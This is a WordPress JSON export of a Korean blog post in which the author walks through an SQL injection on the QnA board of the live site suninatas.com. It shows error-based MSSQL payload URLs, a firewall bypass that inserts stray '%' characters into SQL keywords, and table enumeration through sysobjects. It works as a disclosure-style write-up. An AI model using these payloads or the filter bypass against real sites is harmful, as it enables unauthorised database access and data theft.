{"id":77,"date":"2018-11-28T15:49:02","date_gmt":"2018-11-28T15:49:02","guid":{"rendered":"https:\/\/blog.rubiya.kr\/?p=77"},"modified":"2018-11-28T15:51:47","modified_gmt":"2018-11-28T15:51:47","slug":"suninatas-com-sqli-vuln","status":"publish","type":"post","link":"https:\/\/blog.rubiya.kr\/index.php\/2018\/11\/28\/suninatas-com-sqli-vuln\/","title":{"rendered":"suninatas.com sqli vuln"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/blog.rubiya.kr\/wp-content\/uploads\/2018\/11\/sad.png\" alt=\"\" width=\"550\" height=\"226\" class=\"alignnone size-full wp-image-78\" \/><\/p>\n<p>suninatas.com \uc0ac\uc774\ud2b8\uac00 \ucc98\uc74c \ub9cc\ub4e4\uc5b4\uc84c\uc744\ub54c \uc77c\uccb4\uc758 \uc2dc\ud050\uc5b4\ucf54\ub529\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc544\uc11c sqli, \ud30c\uc77c\ub2e4\uc6b4\ub85c\ub4dc \uacf5\uaca9\uc744 \uc131\uacf5\ud574\uc11c Hall of fame \uc5d0 \uc774\ub984\uc744 \uc62c\ub838\uc5c8\ub2e4.<\/p>\n<p>\uadf8\ub7f0\ub370 \uc62c\ud574 \ucd08\uc5d0 \ub2e4\uc2dc \ud55c\ubc88 SQL Injection \uc744 \uc131\uacf5\ud588\ub294\ub370 mssql \ud658\uacbd\uc5d0\uc11c\uc758 \uacf5\uaca9\uacbd\ud5d8\uc774 \uc7ac\ubbf8\uc788\uc5c8\ub358\uc9c0\ub77c \uacf5\uaca9 \uacfc\uc815\uc744 \ud3ec\uc2a4\ud305\ud558\uaca0\ub2e4.<\/p>\n<p>\ucde8\uc57d\uc810\uc740 QnA \uac8c\uc2dc\ud310\uc758 \uae00 \uc218\uc815 \uae30\ub2a5\uc5d0\uc11c \ud130\uc9c4\ub2e4.<\/p>\n<p>\uae00 \uc218\uc815\uc744 \ub20c\ub7ec\ubcf4\uba74<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=2592&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub807\uac8c \ub728\ub294\ub370 idx \uc778\uc790\ub97c \uc870\uc791\uc774 \uac00\ub2a5\ud558\ub2e4.<\/p>\n<p>mssql\uc740 \uc11c\ub85c \ub2e4\ub978 \ud0c0\uc785\uc758 \uac12\uc744 \ube44\uad50\ud574\uc8fc\uba74 \uc55e\uc758 \uc778\uc790\ub97c \uc5d0\ub7ec\uba54\uc138\uc9c0\uc5d0\uc11c \uadf8\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uae30\uc5d0 \uc5d0\ub7ec\uae30\ubc18 sql injection \uacf5\uaca9\uc744 
\ud558\uae30\uc5d0 \uc218\uc6d4\ud558\ub2e4.<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1'%20and%20database()=1--&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub798 \uacf5\uaca9\ud574\uc8fc\uba74 database \uc774\ub984\uc774 suninatas \uc778 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4. (database() \ub294 mysql \ud568\uc218\uc774\uace0 mssql \uc5d0\uc11c\ub294 db_name() \uc744 \uc0ac\uc6a9\ud574\uc57c \ud55c\ub2e4.)<\/p>\n<p>\uadf8\ub7ec\ub098 \ud638\uc2a4\ud305\uc5c5\uccb4\uc5d0\uc11c \uc790\uccb4\uc801\uc73c\ub85c \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\ub294\uc9c0 \uc8fc\uc694\ud55c \ub2e8\uc5b4\ub4e4\uc744 \uc785\ub825\ud558\uba74 \ucd9c\ub825\uc744 \ud558\uc9c0 \uc54a\uc558\ub2e4.<\/p>\n<p>(\uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\uc744 \uacbd\uc6b0\uc5d0\ub294 \uba54\uc138\uc9c0\ub97c \ub744\uc6b0\uace0 \ub85c\uadf8\uc544\uc6c3\uc744 \uc2dc\ucf1c\ubc84\ub9ac\uae30\uc5d0 \uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\ud55c\uac8c \uc544\ub2c8\ub77c\uace0 \ucd94\uce21\ud560 \uc218 \uc788\uc5c8\ub2e4.)<\/p>\n<p>\ubc29\ud654\ubcbd\uc758 \uacbd\uc6b0\uc5d0\ub294 \ubc1b\uc544\uc628 \uac12\uc744 \uccb4\ud06c\ud558\ub294 \uacbd\uc6b0\ubcf4\ub2e4 url\uc744 \uc9c1\uc811 \uccb4\ud06c\ud574\uc11c \uacf5\uaca9\uc744 \ub9c9\ub294 \uacbd\uc6b0\uac00 \ub9ce\uae30\uc5d0 url\uc744 % \ub85c \uc624\uc5fc\uc2dc\ucf1c\uc11c \ubc29\ud654\ubcbd\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n<p>% \ub4a4\uc5d0 16\uc9c4\uc218 2\uac1c\uac00 \uc548\uc62c\uacbd\uc6b0\uc5d0 \uc11c\ubc84\uc5d0\uc11c\ub294 \uc54c\uc544\uc11c % \ub97c \ubb34\uc2dc\ud558\uace0 \uac12\uc744 \ubc1b\uc544\ub4e4\uc774\uc9c0\ub9cc \ubc29\ud654\ubcbd\uc5d0\uc11c\ub294 % \ub54c\ubb38\uc5d0 \uc8fc\uc694 \ub2e8\uc5b4\ub97c \uccb4\ud06c\ud558\uc9c0 \ubabb\ud558\ub294 \uc6d0\ub9ac\uc774\ub2e4.<\/p>\n<p>mysql\uc758 information_schema \uc640 \uac19\uc740 \uc5ed\ud560\uc744 \ud558\ub294 sysobjects \ub97c \ud1b5\ud574\uc11c \uacf5\uaca9\uc744 \uc9c4\ud589\ud560 \uc218 \uc788\ub2e4.<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=<br 
\/>\n1'an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20'U')=1--&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub7f0 \uacfc\uc815\uc744 \ud1b5\ud574\uc11c \ud14c\uc774\ube14\uba85\uc744 \uc54c\uc544\ub0bc \uc218 \uc788\uc5c8\uc73c\uba70 mssql \uc740 limit \ubb38\ubc95\uc774 \uc5c6\uae30\uc5d0 limit \uc744 \ub300\uc2e0\ud558\uae30 \uc704\ud574\uc11c\ub294<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=<br \/>\n1'an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20'U'%20an%d%20name%20not%20in(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xty%pe%20=%20'U'))=1--&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub807\uac8c \uacf5\uaca9\ud574\uc918\uc57c\ud55c\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>suninatas.com \uc0ac\uc774\ud2b8\uac00 \ucc98\uc74c \ub9cc\ub4e4\uc5b4\uc84c\uc744\ub54c \uc77c\uccb4\uc758 \uc2dc\ud050\uc5b4\ucf54\ub529\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc544\uc11c sqli, \ud30c\uc77c\ub2e4\uc6b4\ub85c\ub4dc \uacf5\uaca9\uc744 \uc131\uacf5\ud574\uc11c Hall of fame \uc5d0 \uc774\ub984\uc744 \uc62c\ub838\uc5c8\ub2e4. \uadf8\ub7f0\ub370 \uc62c\ud574 \ucd08\uc5d0 \ub2e4\uc2dc \ud55c\ubc88 SQL Injection \uc744 \uc131\uacf5\ud588\ub294\ub370 mssql \ud658\uacbd\uc5d0\uc11c\uc758 \uacf5\uaca9\uacbd\ud5d8\uc774 \uc7ac\ubbf8\uc788\uc5c8\ub358\uc9c0\ub77c \uacf5\uaca9 \uacfc\uc815\uc744 \ud3ec\uc2a4\ud305\ud558\uaca0\ub2e4. \ucde8\uc57d\uc810\uc740 QnA \uac8c\uc2dc\ud310\uc758 \uae00 \uc218\uc815 \uae30\ub2a5\uc5d0\uc11c \ud130\uc9c4\ub2e4. \uae00 \uc218\uc815\uc744 \ub20c\ub7ec\ubcf4\uba74 http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=2592&#038;num=313&#038;divi=Free \uc774\ub807\uac8c \ub728\ub294\ub370 idx \uc778\uc790\ub97c \uc870\uc791\uc774 \uac00\ub2a5\ud558\ub2e4. 
mssql\uc740 \uc11c\ub85c \ub2e4\ub978 \ud0c0\uc785\uc758 \uac12\uc744 \ube44\uad50\ud574\uc8fc\uba74 \uc55e\uc758 \uc778\uc790\ub97c \uc5d0\ub7ec\uba54\uc138\uc9c0\uc5d0\uc11c \uadf8\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uae30\uc5d0 \uc5d0\ub7ec\uae30\ubc18 sql injection \uacf5\uaca9\uc744 \ud558\uae30\uc5d0 \uc218\uc6d4\ud558\ub2e4. http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1'%20and%20database()=1--&#038;num=313&#038;divi=Free \uc774\ub798 \uacf5\uaca9\ud574\uc8fc\uba74 database \uc774\ub984\uc774 suninatas \uc778 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4. \uadf8\ub7ec\ub098 \ud638\uc2a4\ud305\uc5c5\uccb4\uc5d0\uc11c \uc790\uccb4\uc801\uc73c\ub85c \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\ub294\uc9c0 \uc8fc\uc694\ud55c \ub2e8\uc5b4\ub4e4\uc744 \uc785\ub825\ud558\uba74 \ucd9c\ub825\uc744 \ud558\uc9c0 \uc54a\uc558\ub2e4. (\uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\uc744 \uacbd\uc6b0\uc5d0\ub294 \uba54\uc138\uc9c0\ub97c \ub744\uc6b0\uace0 \ub85c\uadf8\uc544\uc6c3\uc744 \uc2dc\ucf1c\ubc84\ub9ac\uae30\uc5d0 \uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\ud55c\uac8c \uc544\ub2c8\ub77c\uace0 \ucd94\uce21\ud560 \uc218 \uc788\uc5c8\ub2e4.) \ubc29\ud654\ubcbd\uc758 \uacbd\uc6b0\uc5d0\ub294 \ubc1b\uc544\uc628 \uac12\uc744 \uccb4\ud06c\ud558\ub294 \uacbd\uc6b0\ubcf4\ub2e4 url\uc744 \uc9c1\uc811 \uccb4\ud06c\ud574\uc11c \uacf5\uaca9\uc744 \ub9c9\ub294 \uacbd\uc6b0\uac00 \ub9ce\uae30\uc5d0 url\uc744 % \ub85c \uc624\uc5fc\uc2dc\ucf1c\uc11c \ubc29\ud654\ubcbd\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4. % \ub4a4\uc5d0 16\uc9c4\uc218 2\uac1c\uac00 \uc548\uc62c\uacbd\uc6b0\uc5d0 \uc11c\ubc84\uc5d0\uc11c\ub294 \uc54c\uc544\uc11c % \ub97c \ubb34\uc2dc\ud558\uace0 \uac12\uc744 \ubc1b\uc544\ub4e4\uc774\uc9c0\ub9cc \ubc29\ud654\ubcbd\uc5d0\uc11c\ub294 % \ub54c\ubb38\uc5d0 \uc8fc\uc694 \ub2e8\uc5b4\ub97c \uccb4\ud06c\ud558\uc9c0 \ubabb\ud558\ub294 \uc6d0\ub9ac\uc774\ub2e4. 
mysql\uc758 information_schema \uc640 \uac19\uc740 \uc5ed\ud560\uc744 \ud558\ub294 sysobjects \ub97c \ud1b5\ud574\uc11c \uacf5\uaca9\uc744 \uc9c4\ud589\ud560 \uc218 \uc788\ub2e4. http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1'an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20'U')=1--&#038;num=313&#038;divi=Free \uc774\ub7f0 \uacfc\uc815\uc744 \ud1b5\ud574\uc11c \ud14c\uc774\ube14\uba85\uc744 \uc54c\uc544\ub0bc \uc218 \uc788\uc5c8\uc73c\uba70 mssql \uc740 limit \ubb38\ubc95\uc774 \uc5c6\uae30\uc5d0 limit \uc744 \ub300\uc2e0\ud558\uae30 \uc704\ud574\uc11c\ub294 http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1'an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20'U'%20an%d%20name%20not%20in(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xty%pe%20=%20'U'))=1--&#038;num=313&#038;divi=Free \uc774\ub807\uac8c 
\uacf5\uaca9\ud574\uc918\uc57c\ud55c\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=77"}],"version-history":[{"count":2,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions"}],"predecessor-version":[{"id":80,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions\/80"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=77"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=77"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=77"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}